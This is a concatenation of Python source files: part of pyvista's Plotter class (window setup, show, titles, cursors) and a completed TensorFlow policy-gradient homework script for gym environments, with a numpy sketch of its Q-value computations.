plotter.add_mesh(pv.Cone(), name='cone') >>> plotter.where_is('box') [(0, 0), (1, 0)] >>> plotter.show() """ places = [] for index in range(len(self.renderers)): if name in self.renderers[index]._actors: places.append(tuple(self.renderers.index_to_loc(index))) return places class Plotter(BasePlotter): """Plotting object to display vtk meshes or numpy arrays. Parameters ---------- off_screen : bool, optional Renders off screen when ``True``. Useful for automated screenshots. notebook : bool, optional When ``True``, the resulting plot is placed inline a jupyter notebook. Assumes a jupyter console is active. Automatically enables ``off_screen``. shape : list or tuple, optional Number of sub-render windows inside of the main window. Specify two across with ``shape=(2, 1)`` and a two by two grid with ``shape=(2, 2)``. By default there is only one render window. Can also accept a string descriptor as shape. E.g.: * ``shape="3|1"`` means 3 plots on the left and 1 on the right, * ``shape="4/2"`` means 4 plots on top and 2 at the bottom. border : bool, optional Draw a border around each render window. Default ``False``. border_color : color_like, optional Either a string, rgb list, or hex color string. For example: * ``color='white'`` * ``color='w'`` * ``color=[1.0, 1.0, 1.0]`` * ``color='#FFFFFF'`` window_size : list, optional Window size in pixels. Defaults to ``[1024, 768]``, unless set differently in the relevant theme's ``window_size`` property. multi_samples : int, optional The number of multi-samples used to mitigate aliasing. 
4 is a good default but 8 will have better results with a potential impact on performance. line_smoothing : bool, optional If ``True``, enable line smoothing. polygon_smoothing : bool, optional If ``True``, enable polygon smoothing. lighting : str, optional What lighting to set up for the plotter. Accepted options: * ``'light_kit'``: a vtk Light Kit composed of 5 lights. * ``'three lights'``: illumination using 3 lights. * ``'none'``: no light sources at instantiation. The default is a ``'light_kit'`` (to be precise, 5 separate lights that act like a Light Kit). theme : pyvista.themes.DefaultTheme, optional Plot-specific theme. Examples -------- >>> import pyvista >>> from pyvista import examples >>> mesh = examples.load_hexbeam() >>> another_mesh = examples.load_uniform() >>> plotter = pyvista.Plotter() >>> actor = plotter.add_mesh(mesh, color='red') >>> actor = plotter.add_mesh(another_mesh, color='blue') >>> plotter.show() """ last_update_time = 0.0 right_timer_id = -1 def __init__( self, off_screen=None, notebook=None, shape=(1, 1), groups=None, row_weights=None, col_weights=None, border=None, border_color='k', border_width=2.0, window_size=None, multi_samples=None, line_smoothing=False, point_smoothing=False, polygon_smoothing=False, splitting_position=None, title=None, lighting='light kit', theme=None, ): """Initialize a vtk plotting object.""" super().__init__( shape=shape, border=border, border_color=border_color, border_width=border_width, groups=groups, row_weights=row_weights, col_weights=col_weights, splitting_position=splitting_position, title=title, lighting=lighting, theme=theme, ) log.debug('Plotter init start') # check if a plotting backend is enabled _warn_xserver() def on_timer(iren, event_id): """Exit application if interactive renderer stops.""" if event_id == 'TimerEvent' and self.iren._style != "Context": self.iren.terminate_app() if off_screen is None: off_screen = pyvista.OFF_SCREEN if notebook is None: if self._theme.notebook is not None: notebook = self._theme.notebook else: notebook = scooby.in_ipykernel() self.notebook = notebook if self.notebook: off_screen = True self.off_screen = off_screen self._window_size_unset = False if window_size is None: self._window_size_unset = True window_size = self._theme.window_size self.__prior_window_size = window_size if multi_samples is None: multi_samples = self._theme.multi_samples # initialize render window self.ren_win = _vtk.vtkRenderWindow() self.ren_win.SetMultiSamples(multi_samples) self.ren_win.SetBorders(True) if line_smoothing: self.ren_win.LineSmoothingOn() if point_smoothing: self.ren_win.PointSmoothingOn() if polygon_smoothing: self.ren_win.PolygonSmoothingOn() for renderer in self.renderers: self.ren_win.AddRenderer(renderer) # Add the shadow renderer to allow us to capture interactions within # a given viewport # https://vtk.org/pipermail/vtkusers/2018-June/102030.html number_or_layers = self.ren_win.GetNumberOfLayers() current_layer = self.renderer.GetLayer() self.ren_win.SetNumberOfLayers(number_or_layers + 1) self.ren_win.AddRenderer(self.renderers.shadow_renderer) self.renderers.shadow_renderer.SetLayer(current_layer + 1) self.renderers.shadow_renderer.SetInteractive(False) # never needs to capture if self.off_screen: self.ren_win.SetOffScreenRendering(1) # vtkGenericRenderWindowInteractor has no event loop and # allows the display client to close on Linux when # off_screen. 
We still want an interactor for off screen # plotting since there are some widgets (like the axes # widget) that need an interactor interactor = _vtk.vtkGenericRenderWindowInteractor() else: interactor = None # Add ren win and interactor self.iren = RenderWindowInteractor(self, light_follow_camera=False, interactor=interactor) self.iren.set_render_window(self.ren_win) self.enable_trackball_style() # internally calls update_style() self.iren.add_observer("KeyPressEvent", self.key_press_event) # Set camera widget based on theme. This requires that an # interactor be present. if self.theme._enable_camera_orientation_widget: self.add_camera_orientation_widget() # Set background self.set_background(self._theme.background) # Set window size self.window_size = window_size # add timer event if interactive render exists self.iren.add_observer(_vtk.vtkCommand.TimerEvent, on_timer) if self._theme.depth_peeling.enabled: if self.enable_depth_peeling(): for renderer in self.renderers: renderer.enable_depth_peeling() log.debug('Plotter init stop') def show( self, title=None, window_size=None, interactive=True, auto_close=None, interactive_update=False, full_screen=None, screenshot=False, return_img=False, cpos=None, use_ipyvtk=None, jupyter_backend=None, return_viewer=False, return_cpos=None, **kwargs, ): """Display the plotting window. Parameters ---------- title : str, optional Title of plotting window. Defaults to :attr:`pyvista.global_theme.title <pyvista.themes.DefaultTheme.title>`. window_size : list, optional Window size in pixels. Defaults to :attr:`pyvista.global_theme.window_size <pyvista.themes.DefaultTheme.window_size>`. interactive : bool, optional Enabled by default. Allows user to pan and move figure. Defaults to :attr:`pyvista.global_theme.interactive <pyvista.themes.DefaultTheme.interactive>`. auto_close : bool, optional Exits plotting session when user closes the window when interactive is ``True``. Defaults to :attr:`pyvista.global_theme.auto_close <pyvista.themes.DefaultTheme.auto_close>`. interactive_update : bool, optional Disabled by default. Allows user to non-blocking draw, user should call :func:`BasePlotter.update` in each iteration. full_screen : bool, optional Opens window in full screen. When enabled, ignores ``window_size``. Defaults to :attr:`pyvista.global_theme.full_screen <pyvista.themes.DefaultTheme.full_screen>`. screenshot : str, pathlib.Path, BytesIO or bool, optional Take a screenshot of the initial state of the plot. If a string, it specifies the path to which the screenshot is saved. If ``True``, the screenshot is returned as an array. Defaults to ``False``. For interactive screenshots it's recommended to first call ``show()`` with ``auto_close=False`` to set the scene, then save the screenshot in a separate call to ``show()`` or :func:`Plotter.screenshot`. return_img : bool Returns a numpy array representing the last image along with the camera position. cpos : list(tuple(floats)) The camera position. You can also set this with :attr:`Plotter.camera_position`. use_ipyvtk : bool, optional Deprecated. Instead, set the backend either globally with ``pyvista.set_jupyter_backend('ipyvtklink')`` or with ``backend='ipyvtklink'``. jupyter_backend : str, optional Jupyter notebook plotting backend to use. One of the following: * ``'none'`` : Do not display in the notebook. * ``'pythreejs'`` : Show a ``pythreejs`` widget * ``'static'`` : Display a static figure. * ``'ipygany'`` : Show a ``ipygany`` widget * ``'panel'`` : Show a ``panel`` widget. 
This can also be set globally with :func:`pyvista.set_jupyter_backend`. return_viewer : bool, optional Return the jupyterlab viewer, scene, or display object when plotting with jupyter notebook. return_cpos : bool, optional Return the last camera position from the render window when enabled. Default based on theme setting. See :attr:`pyvista.themes.DefaultTheme.return_cpos`. **kwargs : dict, optional Developer keyword arguments. Returns ------- cpos : list List of camera position, focal point, and view up. Returned only when ``return_cpos=True`` or set in the default global or plot theme. Not returned when in a jupyter notebook and ``return_viewer=True``. image : np.ndarray Numpy array of the last image when either ``return_img=True`` or ``screenshot=True`` is set. Not returned when in a jupyter notebook with ``return_viewer=True``. Optionally contains alpha values. Sized: * [Window height x Window width x 3] if the theme sets ``transparent_background=False``. * [Window height x Window width x 4] if the theme sets ``transparent_background=True``. widget IPython widget when ``return_viewer=True``. Notes ----- Please use the ``q``-key to close the plotter as some operating systems (namely Windows) will experience issues saving a screenshot if the exit button in the GUI is pressed. Examples -------- Simply show the plot of a mesh. >>> import pyvista as pv >>> pl = pv.Plotter() >>> _ = pl.add_mesh(pv.Cube()) >>> pl.show() Take a screenshot interactively. Screenshot will be of the first image shown, so use the first call with ``auto_close=False`` to set the scene before taking the screenshot. >>> pl = pv.Plotter() >>> _ = pl.add_mesh(pv.Cube()) >>> pl.show(auto_close=False) # doctest:+SKIP >>> pl.show(screenshot='my_image.png') # doctest:+SKIP Display a ``pythreejs`` scene within a jupyter notebook >>> pl.show(jupyter_backend='pythreejs') # doctest:+SKIP Return a ``pythreejs`` scene. >>> pl.show(jupyter_backend='pythreejs', return_viewer=True) # doctest:+SKIP Obtain the camera position when using ``show``. >>> pl = pv.Plotter() >>> _ = pl.add_mesh(pv.Sphere()) >>> pl.show(return_cpos=True) # doctest:+SKIP [(2.223005211686484, -0.3126909484828709, 2.4686209867735065), (0.0, 0.0, 0.0), (-0.6839951597283509, -0.47207319712073137, 0.5561452310578585)] """ # developer keyword argument: runs a function immediately prior to ``close`` self._before_close_callback = kwargs.pop('before_close_callback', None) jupyter_kwargs = kwargs.pop('jupyter_kwargs', {}) assert_empty_kwargs(**kwargs) if interactive_update and auto_close is None: auto_close = False elif interactive_update and auto_close: warnings.warn( textwrap.dedent( """ The plotter will close immediately automatically since ``auto_close=True``. Either, do not specify ``auto_close``, or set it to ``False`` if you want to interact with the plotter interactively. """ ).strip() ) elif auto_close is None: auto_close = self._theme.auto_close if use_ipyvtk: txt = textwrap.dedent( """ use_ipyvtk is deprecated. 
Set the backend globally with ``pyvista.set_jupyter_backend("ipyvtklink") or with ``backend="ipyvtklink"`` """ ).strip() from pyvista.core.errors import DeprecationError raise DeprecationError(txt) if not hasattr(self, "ren_win"): raise RuntimeError("This plotter has been closed and cannot be shown.") if full_screen is None: full_screen = self._theme.full_screen if full_screen: self.ren_win.SetFullScreen(True) self.ren_win.BordersOn() # super buggy when disabled else: if window_size is None: window_size = self.window_size else: self._window_size_unset = False self.ren_win.SetSize(window_size[0], window_size[1]) # reset unless camera for the first render unless camera is set self._on_first_render_request(cpos) # handle plotter notebook if jupyter_backend and not self.notebook: warnings.warn( 'Not within a jupyter notebook environment.\nIgnoring ``jupyter_backend``.' ) if self.notebook: from ..jupyter.notebook import handle_plotter if jupyter_backend is None: jupyter_backend = self._theme.jupyter_backend if jupyter_backend != 'none': disp = handle_plotter( self, backend=jupyter_backend, return_viewer=return_viewer, **jupyter_kwargs ) return disp self.render() # This has to be after the first render for some reason if title is None: title = self.title if title: self.ren_win.SetWindowName(title) self.title = title # Keep track of image for sphinx-gallery if pyvista.BUILDING_GALLERY or screenshot: # always save screenshots for sphinx_gallery self.last_image = self.screenshot(screenshot, return_img=True) self.last_image_depth = self.get_image_depth() # See: https://github.com/pyvista/pyvista/issues/186#issuecomment-550993270 if interactive and not self.off_screen: try: # interrupts will be caught here log.debug('Starting iren') self.iren.update_style() if not interactive_update: # Resolves #1260 if os.name == 'nt': if _vtk.VTK9: self.iren.process_events() else: global VERY_FIRST_RENDER if not VERY_FIRST_RENDER: self.iren.start() VERY_FIRST_RENDER = False self.iren.start() self.iren.initialize() except KeyboardInterrupt: log.debug('KeyboardInterrupt') self.close() raise KeyboardInterrupt # In the event that the user hits the exit-button on the GUI (on # Windows OS) then it must be finalized and deleted as accessing it # will kill the kernel. # Here we check for that and clean it up before moving on to any of # the closing routines that might try to still access that # render window. if not self.ren_win.IsCurrent(): self._clear_ren_win() # The ren_win is deleted # proper screenshots cannot be saved if this happens if not auto_close: warnings.warn( "`auto_close` ignored: by clicking the exit button, " "you have destroyed the render window and we have to " "close it out." ) auto_close = True # NOTE: after this point, nothing from the render window can be accessed # as if a user presed the close button, then it destroys the # the render view and a stream of errors will kill the Python # kernel if code here tries to access that renderer. # See issues #135 and #186 for insight before editing the # remainder of this function. # Close the render window if requested if auto_close: self.close() # If user asked for screenshot, return as numpy array after camera # position if return_img or screenshot is True: if return_cpos: return self.camera_position, self.last_image if return_cpos: return self.camera_position def add_title(self, title, font_size=18, color=None, font=None, shadow=False): """Add text to the top center of the plot. 
This is merely a convenience method that calls ``add_text`` with ``position='upper_edge'``. Parameters ---------- title : str The text to add the rendering. font_size : float, optional Sets the size of the title font. Defaults to 16 or the value of the global theme if set. color : color_like, optional, Either a string, rgb list, or hex color string. Defaults to white or the value of the global theme if set. For example: * ``color='white'`` * ``color='w'`` * ``color=[1.0, 1.0, 1.0]`` * ``color='#FFFFFF'`` font : str, optional Font name may be ``'courier'``, ``'times'``, or ``'arial'``. shadow : bool, optional Adds a black shadow to the text. Defaults to ``False``. Returns ------- vtk.vtkTextActor Text actor added to plot. Examples -------- >>> import pyvista >>> pl = pyvista.Plotter() >>> pl.background_color = 'grey' >>> actor = pl.add_title('Plot Title', font='courier', color='k', ... font_size=40) >>> pl.show() """ # add additional spacing from the top of the figure by default title = '\n' + title return self.add_text( title, position='upper_edge', font_size=font_size, color=color, font=font, shadow=shadow, name='title', viewport=False, ) def add_cursor( self, bounds=(-1.0, 1.0, -1.0, 1.0, -1.0, 1.0), focal_point=(0.0, 0.0, 0.0), color=None, ): """Add a cursor of a PyVista or VTK dataset to the scene. Parameters ---------- bounds : length 6 sequence Specify the bounds in the format of: - ``(xmin, xmax, ymin, ymax, zmin, zmax)`` Defaults to ``(-1.0, 1.0, -1.0, 1.0, -1.0, 1.0)``. focal_point : list or tuple, optional The focal point of the cursor. Defaults to ``(0.0, 0.0, 0.0)``. color : color_like, optional Either a string, RGB sequence, or hex color string. For one of the following. * ``color='white'`` * ``color='w'`` * ``color=[1.0, 1.0, 1.0]`` * ``color='#FFFFFF'`` Returns ------- vtk.vtkActor VTK actor of the 2D cursor. Examples -------- >>> import pyvista >>> sphere = pyvista.Sphere() >>> plotter = pyvista.Plotter() >>> _ = plotter.add_mesh(sphere) >>> _ = plotter.add_cursor() >>> plotter.show() """ alg = _vtk.vtkCursor3D() alg.SetModelBounds(bounds) alg.SetFocalPoint(focal_point) alg.AllOn() mapper = make_mapper(_vtk.vtkDataSetMapper) mapper.SetInputConnection(alg.GetOutputPort()) actor, prop = self.add_actor(mapper) prop.SetColor(Color(color).float_rgb) return actor # Tracks created plotters. At the end of the file as we need to # define ``BasePlotter`` before including it in the type definition. _ALL_PLOTTERS: Dict[str, BasePlotter] = {} def _kill_display(disp_id): # pragma: no cover """Forcibly close the display on Linux. See: https://gitlab.kitware.com/vtk/vtk/-/issues/17917#note_783584 And more details into why... https://stackoverflow.com/questions/64811503 Notes ----- This is to be used experimentally and is known to cause issues on `pyvistaqt` """ if platform.system() != 'Linux': raise OSError('This method only works on Linux') if disp_id: cdisp_id = int(disp_id[1:].split('_')[0], 16) # this is unsafe as events might be queued, but sometimes the # window fails to close if we don't just close it Thread(target=X11.XCloseDisplay, args=(cdisp_id,)).start()
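# Illustrative usage sketch for the OBJ-export wrapper shown at the top of
# this section (export_obj in upstream pyvista, built on vtkOBJExporter).
# This is a hedged example, not upstream code: the prefix 'scene' is made up,
# and with SetFilePrefix as used above the exporter writes 'scene.obj' and
# 'scene.mtl' next to each other. Assumes off-screen rendering is available.
if __name__ == '__main__':  # pragma: no cover - illustrative only
    import pyvista as pv

    _pl = pv.Plotter(off_screen=True)
    _ = _pl.add_mesh(pv.Sphere())
    _pl.export_obj('scene')   # written as scene.obj / scene.mtl
    _pl.close()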
train_pg.py
import numpy as np import tensorflow as tf import gym import logz import scipy.signal import os import time import inspect from multiprocessing import Process #============================================================================================# # Utilities #============================================================================================# def build_mlp( input_placeholder, output_size, scope, n_layers=2, size=64, activation=tf.tanh, output_activation=None ): #========================================================================================# # ----------SECTION 3---------- # Network building # # Your code should make a feedforward neural network (also called a multilayer perceptron) # with 'n_layers' hidden layers of size 'size' units. # # The output layer should have size 'output_size' and activation 'output_activation'. # # Hint: use tf.layers.dense #========================================================================================# with tf.variable_scope(scope): inputs = input_placeholder for _ in range(n_layers): inputs = tf.layers.dense(inputs=inputs, units=size, activation=activation) outputs = tf.layers.dense(inputs=inputs, units=output_size, activation=output_activation) return outputs def pathlength(path): return len(path["reward"]) #============================================================================================# # Policy Gradient #============================================================================================# def train_PG(exp_name='', env_name='CartPole-v0', n_iter=100, gamma=1.0, min_timesteps_per_batch=1000, max_path_length=None, learning_rate=5e-3, reward_to_go=True, animate=True, logdir=None, normalize_advantages=True, nn_baseline=False, seed=0, # network arguments n_layers=1, size=32 ): start = time.time() # Configure output directory for logging logz.configure_output_dir(logdir) # Log experimental parameters args = inspect.getargspec(train_PG)[0] locals_ = locals() params = {k: locals_[k] if k in locals_ else None for k in args} logz.save_params(params) # Set random seeds tf.set_random_seed(seed) np.random.seed(seed) # Make the gym environment env = gym.make(env_name) # Is this env continuous, or discrete? discrete = isinstance(env.action_space, gym.spaces.Discrete) # Maximum length for episodes max_path_length = max_path_length or env.spec.max_episode_steps #========================================================================================# # Notes on notation: # # Symbolic variables have the prefix sy_, to distinguish them from the numerical values # that are computed later in the function # # Prefixes and suffixes: # ob - observation # ac - action # _no - this tensor should have shape (batch size /n/, observation dim) # _na - this tensor should have shape (batch size /n/, action dim) # _n - this tensor should have shape (batch size /n/) # # Note: batch size /n/ is defined at runtime, and until then, the shape for that axis # is None #========================================================================================# # Observation and action sizes ob_dim = env.observation_space.shape[0] ac_dim = env.action_space.n if discrete else env.action_space.shape[0] #========================================================================================# # ----------SECTION 4---------- # Placeholders # # Need these for batch observations / actions / advantages in policy gradient loss function. 
#========================================================================================# sy_ob_no = tf.placeholder(shape=[None, ob_dim], name="ob", dtype=tf.float32) if discrete: sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32) else: sy_ac_na = tf.placeholder(shape=[None, ac_dim], name="ac", dtype=tf.float32) # Define a placeholder for advantages sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32) #========================================================================================# # ----------SECTION 4---------- # Networks # # Make symbolic operations for # 1. Policy network outputs which describe the policy distribution. # a. For the discrete case, just logits for each action. # # b. For the continuous case, the mean / log std of a Gaussian distribution over # actions. # # Hint: use the 'build_mlp' function you defined in utilities. # # Note: these ops should be functions of the placeholder 'sy_ob_no' # # 2. Producing samples stochastically from the policy distribution. # a. For the discrete case, an op that takes in logits and produces actions. # # Should have shape [None] # # b. For the continuous case, use the reparameterization trick: # The output from a Gaussian distribution with mean 'mu' and std 'sigma' is # # mu + sigma * z, z ~ N(0, I) # # This reduces the problem to just sampling z. (Hint: use tf.random_normal!) # # Should have shape [None, ac_dim] # # Note: these ops should be functions of the policy network output ops. # # 3. Computing the log probability of a set of actions that were actually taken, # according to the policy. # # Note: these ops should be functions of the placeholder 'sy_ac_na', and the # policy network output ops. # #========================================================================================# if discrete: # Hint: use the 'build_mlp' function you defined in utilities. sy_logits_na = build_mlp(sy_ob_no, ac_dim, "discrete", n_layers=n_layers, size=size) # Hint: Use the tf.multinomial op. sy_sampled_ac = tf.multinomial(sy_logits_na, 1)[0] mask = tf.one_hot(sy_ac_na, ac_dim) log_prob = tf.nn.log_softmax(sy_logits_na) sy_logprob_n = tf.reduce_sum(tf.multiply(mask, log_prob), axis=1) else: # Hint: use the 'build_mlp' function you defined in utilities. sy_mean = build_mlp(sy_ob_no, ac_dim, "continuous", n_layers=n_layers, size=size) # logstd should just be a trainable variable, not a network output. sy_logstd = tf.Variable(tf.zeros([ac_dim])) # Hint: use tf.random_normal. sy_sampled_ac = sy_mean + tf.exp(sy_logstd) * tf.random_normal([ac_dim]) # Hint: Use the log probability under a multivariate gaussian. power = tf.divide(tf.square(sy_ac_na - sy_mean), -2*tf.square(tf.exp(sy_logstd))) prob = float(1)/np.sqrt(2*np.pi) * tf.divide(tf.exp(power), tf.exp(sy_logstd)) sy_logprob_n = tf.reduce_sum(tf.log(prob), axis=1) #========================================================================================# # ----------SECTION 4---------- # Loss Function and Training Operation #========================================================================================# # Loss function that we'll differentiate to get the policy gradient. 
loss = -tf.reduce_mean(sy_logprob_n * sy_adv_n) update_op = tf.train.AdamOptimizer(learning_rate).minimize(loss) #========================================================================================# # ----------SECTION 5---------- # Optional Baseline #========================================================================================# if nn_baseline: baseline_prediction = tf.squeeze(build_mlp( sy_ob_no, 1, "nn_baseline", n_layers=n_layers, size=size)) # Define placeholders for targets, a loss function and an update op for fitting a # neural network baseline. These will be used to fit the neural network baseline. # YOUR_CODE_HERE sy_base_n = tf.placeholder(shape=[None], name="base", dtype=tf.float32) bl_loss = tf.nn.l2_loss(sy_base_n - baseline_prediction) baseline_update_op = tf.train.AdamOptimizer(learning_rate).minimize(bl_loss) #========================================================================================# # Tensorflow Engineering: Config, Session, Variable initialization #========================================================================================# tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1) sess = tf.Session(config=tf_config) sess.__enter__() # equivalent to `with sess:` tf.global_variables_initializer().run() #pylint: disable=E1101 #========================================================================================# # Training Loop #========================================================================================# total_timesteps = 0 for itr in range(n_iter): print("********** Iteration %i ************"%itr) # Collect paths until we have enough timesteps timesteps_this_batch = 0 paths = [] while True: ob = env.reset() obs, acs, rewards = [], [], [] animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and animate) steps = 0 while True: if animate_this_episode: env.render() time.sleep(0.05) obs.append(ob) ac = sess.run(sy_sampled_ac, feed_dict={sy_ob_no : ob[None]}) ac = ac[0] acs.append(ac) ob, rew, done, _ = env.step(ac) rewards.append(rew) steps += 1 if done or steps > max_path_length: break path = {"observation" : np.array(obs), "reward" : np.array(rewards), "action" : np.array(acs)} paths.append(path) timesteps_this_batch += pathlength(path) if timesteps_this_batch > min_timesteps_per_batch: break total_timesteps += timesteps_this_batch # Build arrays for observation, action for the policy gradient update by concatenating # across paths ob_no = np.concatenate([path["observation"] for path in paths]) ac_na = np.concatenate([path["action"] for path in paths]) #====================================================================================# # ----------SECTION 4---------- # Computing Q-values # # Your code should construct numpy arrays for Q-values which will be used to compute # advantages (which will in turn be fed to the placeholder you defined above). # # Recall that the expression for the policy gradient PG is # # PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t )] # # where # # tau=(s_0, a_0, ...) is a trajectory, # Q_t is the Q-value at time t, Q^{pi}(s_t, a_t), # and b_t is a baseline which may depend on s_t. # # You will write code for two cases, controlled by the flag 'reward_to_go': # # Case 1: trajectory-based PG # # (reward_to_go = False) # # Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over # entire trajectory (regardless of which time step the Q-value should be for). 
# # For this case, the policy gradient estimator is # # E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)] # # where # # Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}. # # Thus, you should compute # # Q_t = Ret(tau) # # Case 2: reward-to-go PG # # (reward_to_go = True) # # Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting # from time step t. Thus, you should compute # # Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'} # # # Store the Q-values for all timesteps and all trajectories in a variable 'q_n', # like the 'ob_no' and 'ac_na' above. # #====================================================================================# # YOUR_CODE_HERE q_n = [] for path in paths: reward = path["reward"] if not reward_to_go: discounted_reward = np.sum([gamma**t*reward[t] for t in range(len(reward))]) * np.ones(len(reward)) else: discount = np.array([gamma**t for t in range(len(reward))]) discounted_reward = np.array([np.dot(discount[:len(reward)-t], reward[t:]) for t in range(len(reward))]) q_n.append(discounted_reward) q_n = np.concatenate(q_n) #====================================================================================# # ----------SECTION 5---------- # Computing Baselines #====================================================================================# if nn_baseline: # If nn_baseline is True, use your neural network to predict reward-to-go # at each timestep for each trajectory, and save the result in a variable 'b_n' # like 'ob_no', 'ac_na', and 'q_n'. # # Hint #bl1: rescale the output from the nn_baseline to match the statistics # (mean and std) of the current or previous batch of Q-values. (Goes with Hint # #bl2 below.) b_n = sess.run(baseline_prediction, feed_dict={sy_ob_no:ob_no}) normalized_b_n = (b_n - np.mean(b_n)) / np.std(b_n) b_n = normalized_b_n * np.std(q_n) + np.mean(q_n) adv_n = q_n - b_n else: adv_n = q_n.copy() #====================================================================================# # ----------SECTION 4---------- # Advantage Normalization #====================================================================================# if normalize_advantages: # On the next line, implement a trick which is known empirically to reduce variance # in policy gradient methods: normalize adv_n to have mean zero and std=1. # YOUR_CODE_HERE adv_n = (adv_n - np.mean(adv_n)) / np.std(adv_n) #====================================================================================# # ----------SECTION 5---------- # Optimizing Neural Network Baseline #====================================================================================# if nn_baseline: # ----------SECTION 5---------- # If a neural network baseline is used, set up the targets and the inputs for the # baseline. # # Fit it to the current batch in order to use for the next iteration. Use the # baseline_update_op you defined earlier. # # Hint #bl2: Instead of trying to target raw Q-values directly, rescale the # targets to have mean zero and std=1. (Goes with Hint #bl1 above.) # YOUR_CODE_HERE rescale = (q_n - np.mean(q_n)) / np.std(q_n) sess.run(baseline_update_op, feed_dict={sy_base_n:rescale, sy_ob_no:ob_no}) #====================================================================================# # ----------SECTION 4---------- # Performing the Policy Update #====================================================================================# # Call the update operation necessary to perform the policy gradient update based on # the current batch of rollouts. 
# # For debug purposes, you may wish to save the value of the loss function before # and after an update, and then log them below. # YOUR_CODE_HERE loss_before = sess.run(loss, feed_dict={sy_ob_no:ob_no, sy_ac_na:ac_na, sy_adv_n:adv_n}) sess.run(update_op, feed_dict={sy_ob_no:ob_no, sy_ac_na:ac_na, sy_adv_n:adv_n}) loss_after = sess.run(loss, feed_dict={sy_ob_no:ob_no, sy_ac_na:ac_na, sy_adv_n:adv_n}) # Log diagnostics returns = [path["reward"].sum() for path in paths] ep_lengths = [pathlength(path) for path in paths] logz.log_tabular("Time", time.time() - start) logz.log_tabular("Iteration", itr) logz.log_tabular("loss before update", loss_before) logz.log_tabular("loss after update", loss_after) logz.log_tabular("AverageReturn", np.mean(returns)) logz.log_tabular("StdReturn", np.std(returns)) logz.log_tabular("MaxReturn", np.max(returns)) logz.log_tabular("MinReturn", np.min(returns)) logz.log_tabular("EpLenMean", np.mean(ep_lengths)) logz.log_tabular("EpLenStd", np.std(ep_lengths)) logz.log_tabular("TimestepsThisBatch", timesteps_this_batch) logz.log_tabular("TimestepsSoFar", total_timesteps) logz.dump_tabular() logz.pickle_tf_vars() def main(): import argparse parser = argparse.ArgumentParser() parser.add_argument('env_name', type=str) parser.add_argument('--exp_name', type=str, default='vpg') parser.add_argument('--render', action='store_true') parser.add_argument('--discount', type=float, default=1.0) parser.add_argument('--n_iter', '-n', type=int, default=100) parser.add_argument('--batch_size', '-b', type=int, default=1000) parser.add_argument('--ep_len', '-ep', type=float, default=-1.) parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3) parser.add_argument('--reward_to_go', '-rtg', action='store_true') parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true') parser.add_argument('--nn_baseline', '-bl', action='store_true') parser.add_argument('--seed', type=int, default=1) parser.add_argument('--n_experiments', '-e', type=int, default=1) parser.add_argument('--n_layers', '-l', type=int, default=1) parser.add_argument('--size', '-s', type=int, default=32) args = parser.parse_args() if not(os.path.exists('data')): os.makedirs('data') logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S") logdir = os.path.join('data', logdir) if not(os.path.exists(logdir)): os.makedirs(logdir) max_path_length = args.ep_len if args.ep_len > 0 else None for e in range(args.n_experiments): seed = args.seed + 10*e print('Running experiment with seed %d'%seed) def train_func(): train_PG( exp_name=args.exp_name, env_name=args.env_name, n_iter=args.n_iter, gamma=args.discount, min_timesteps_per_batch=args.batch_size, max_path_length=max_path_length, learning_rate=args.learning_rate, reward_to_go=args.reward_to_go, animate=args.render, logdir=os.path.join(logdir,'%d'%seed), normalize_advantages=not(args.dont_normalize_advantages), nn_baseline=args.nn_baseline, seed=seed, n_layers=args.n_layers, size=args.size ) # Awkward hacky process runs, because Tensorflow does not like # repeatedly calling train_PG in the same thread. p = Process(target=train_func, args=tuple()) p.start() p.join() # exp_name='', # env_name='CartPole-v0', # n_iter=100, # gamma=1.0, # min_timesteps_per_batch=1000, # max_path_length=None, # learning_rate=5e-3, # reward_to_go=True, # animate=True, # logdir=None, # normalize_advantages=True, # nn_baseline=False, # seed=0, # # network arguments # n_layers=1, # size=32 if __name__ == "__main__": main()
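# Standalone numpy sketch of the two Q-value cases described in the
# "Computing Q-values" comment block above: Case 1 assigns every timestep the
# full discounted trajectory return Ret(tau); Case 2 uses the reward-to-go
# Q_t = sum_{t'>=t} gamma^(t'-t) r_{t'}. The helper names below are
# illustrative only (they are not part of the assignment code) and reuse the
# numpy import from the top of this file.

def full_trajectory_q(rewards, gamma):
    """Case 1: every timestep is assigned the same discounted return Ret(tau)."""
    rewards = np.asarray(rewards, dtype=float)
    discounts = gamma ** np.arange(len(rewards))
    ret = np.sum(discounts * rewards)
    return np.full(len(rewards), ret)

def reward_to_go_q(rewards, gamma):
    """Case 2: Q_t is the discounted sum of rewards from timestep t onward."""
    q = np.zeros(len(rewards))
    running = 0.0
    for t in reversed(range(len(rewards))):
        running = rewards[t] + gamma * running
        q[t] = running
    return q

# Example: rewards [1.0, 0.0, 2.0] with gamma = 0.9 give
#   full_trajectory_q -> [2.62, 2.62, 2.62]
#   reward_to_go_q    -> [2.62, 1.80, 2.00]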
tarea2.py
